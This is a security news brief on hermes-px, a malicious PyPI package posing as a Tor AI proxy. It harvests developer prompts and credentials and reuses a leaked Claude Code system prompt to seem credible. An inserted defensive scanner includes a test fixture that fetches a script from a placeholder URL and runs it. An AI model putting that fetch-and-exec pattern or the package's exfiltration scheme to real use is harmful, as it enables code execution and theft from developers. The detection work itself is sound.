
Malicious PyPI package enables Claude prompt, data compromise | brief | SC Media - SC Media

Google News · April 7, 2026

Detailed Analysis

A malicious Python package named **hermes-px**, discovered on the Python Package Index (PyPI), poses as a legitimate "Secure AI Inference Proxy" while covertly stealing developer data and exploiting a stolen version of Anthropic's proprietary Claude system prompt. The package markets itself as a privacy-enhancing tool that routes AI inference requests through the Tor network, complete with an API interface mimicking the OpenAI Python SDK and RAG pipeline examples designed to appear credible to developers. Beneath this façade, however, hermes-px invisibly logs every user prompt submitted through it and exfiltrates the captured data — including credentials, API keys, proprietary source code, internal URLs, and personal information — to attacker-controlled infrastructure. The package also instructs users to fetch and execute a remote script from a GitHub URL, a technique that enables dynamic payload delivery and allows attackers to update malicious functionality without modifying the package itself.

One of the most technically distinctive elements of this attack is the inclusion of a 246,000-character compressed file, `base_prompt.pz`, that decompresses into a near-verbatim copy of Anthropic's Claude Code system prompt — one of the company's closely guarded proprietary assets. The attackers partially rebranded the stolen prompt, substituting "Claude" references with "AXIOM-1," but forensic indicators including original function names, sandbox directory paths, and residual "Claude" references confirm its authentic origin. This appropriation of a legitimate, sophisticated system prompt serves a dual purpose: it lends the fake proxy tool a veneer of technical authenticity that could deceive developers, and it weaponizes Anthropic's own engineering investment to make the malicious agent behave convincingly while harvesting data. Exfiltrated content is transmitted alongside encrypted payloads mimicking university chatbot communications, a layer of obfuscation designed to blend malicious traffic with benign-looking network activity.
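As an added defensive example (not code from the article or from the package it describes), the following Python triages an installed package directory for two of the indicators the analysis names: a module that fetches a remote script and passes it to `exec()`/`eval()`, and a large compressed blob shipped beside the code like `base_prompt.pz`. The fixture it builds, the `example.invalid` URL and the 64 KiB threshold are constructed for the demonstration.

```python
"""Static triage of an installed package for the indicators described above:
a module that exec()s a remotely fetched script, and a large opaque compressed
blob shipped beside the code. Heuristic input for a reviewer, not a verdict."""
import ast, os, tempfile, zlib
from pathlib import Path

FETCH_FUNCS = {"urlopen", "urlretrieve", "get"}  # urllib.request.* / requests.get
EXEC_FUNCS = {"exec", "eval"}
BLOB_MIN_BYTES = 64 * 1024                       # ignore small compressed assets

def _call_name(node: ast.Call) -> str:
    """Trailing name of a call: urllib.request.urlopen(...) -> 'urlopen'."""
    func = node.func
    return func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")

def scan_module(src: str) -> list[str]:
    """Flag dynamic execution, and fetch-plus-exec within the same module."""
    calls = {_call_name(n) for n in ast.walk(ast.parse(src)) if isinstance(n, ast.Call)}
    hits = []
    if calls & EXEC_FUNCS:
        hits.append("dynamic-exec: " + ", ".join(sorted(calls & EXEC_FUNCS)))
        if calls & FETCH_FUNCS:
            hits.append("remote-fetch-and-exec")
    return hits

def scan_package(root: Path) -> dict[str, list[str]]:
    """Walk a package tree; return {relative path: [indicators]} for files that hit."""
    report: dict[str, list[str]] = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        if path.suffix == ".py":
            hits = scan_module(path.read_text(encoding="utf-8", errors="replace"))
        else:
            data = path.read_bytes()  # 0x78 starts every default zlib stream header
            big_blob = len(data) >= BLOB_MIN_BYTES and data[:1] == b"\x78"
            hits = [f"opaque-zlib-blob: {len(data)} bytes"] if big_blob else []
        if hits:
            report[str(path.relative_to(root))] = hits
    return report

def demo() -> dict[str, list[str]]:
    """Constructed fixture, not the real package: a 'proxy' module that exec()s a
    script fetched from a placeholder URL, plus a ~100 KB compressed blob."""
    root = Path(tempfile.mkdtemp())
    (root / "proxy.py").write_text(
        "import urllib.request\n\ndef bootstrap():\n"
        "    exec(urllib.request.urlopen('https://example.invalid/update.py').read())\n")
    (root / "base_prompt.pz").write_bytes(zlib.compress(os.urandom(100_000)))
    return scan_package(root)
```

Run `scan_package` against a `site-packages/<name>` directory to get the per-file indicator list; a hit is a prompt for manual review of the flagged module, not proof of malice.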

The attack is significant because it targets the software supply chain at a moment when AI tooling adoption among developers is accelerating rapidly. Developers integrating large language model capabilities into their workflows routinely pass sensitive material through AI proxies — including database credentials, internal API keys, and proprietary business logic — making this attack surface particularly high-value. The use of PyPI as a distribution vector is consistent with a well-documented pattern of supply chain attacks in which threat actors publish convincingly named packages to intercept developers searching for legitimate AI utilities. The hermes-px campaign demonstrates that as AI development tooling proliferates, it creates new categories of trust relationships that attackers can exploit: a developer who believes they are routing prompts through a privacy-preserving proxy has every reason to send more sensitive material, not less.

The theft and weaponization of Anthropic's Claude Code system prompt raise broader questions about the security of proprietary AI assets and how leaked or stolen system prompts can be repurposed maliciously. System prompts increasingly encode substantial engineering effort, behavioral guardrails, and competitive intellectual property, and their exposure — whether through prompt injection, insider leaks, or reverse engineering — creates downstream risks that extend beyond any single deployment. For Anthropic specifically, having its internal prompt architecture replicated inside a malware campaign represents both a reputational concern and a practical signal that its systems are being closely studied by adversarial actors. Security researchers and developers are advised to immediately uninstall hermes-px, rotate all credentials and API keys that may have passed through the package, and audit conversation histories for any sensitive disclosures made during its use.
